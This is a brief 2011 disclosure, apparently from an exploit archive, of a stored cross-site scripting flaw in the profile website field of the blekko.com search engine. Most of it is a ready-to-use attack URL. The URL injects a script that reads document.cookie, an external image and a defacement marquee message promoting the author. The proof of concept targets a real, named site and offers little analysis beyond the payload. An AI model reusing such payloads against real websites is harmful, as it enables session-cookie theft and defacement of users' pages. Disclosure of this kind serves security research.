Blekko.com suffers from a cross site scripting vulnerability.
cc0082fff90ceae35d6828580bc3fd564b0a24a4c288be73894d880fd609a4ea
# Date: 24.11.2011
# Author: Sony
# Site: http://blekko.com
# My blog and PoC:
http://st2tea.blogspot.com/2011/11/blekkocom-web-search-engine-cross-site.html
What is blekko.com?
You can read here:
http://en.wikipedia.org/wiki/Blekko
So..our xss in the profile (website link)..
http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E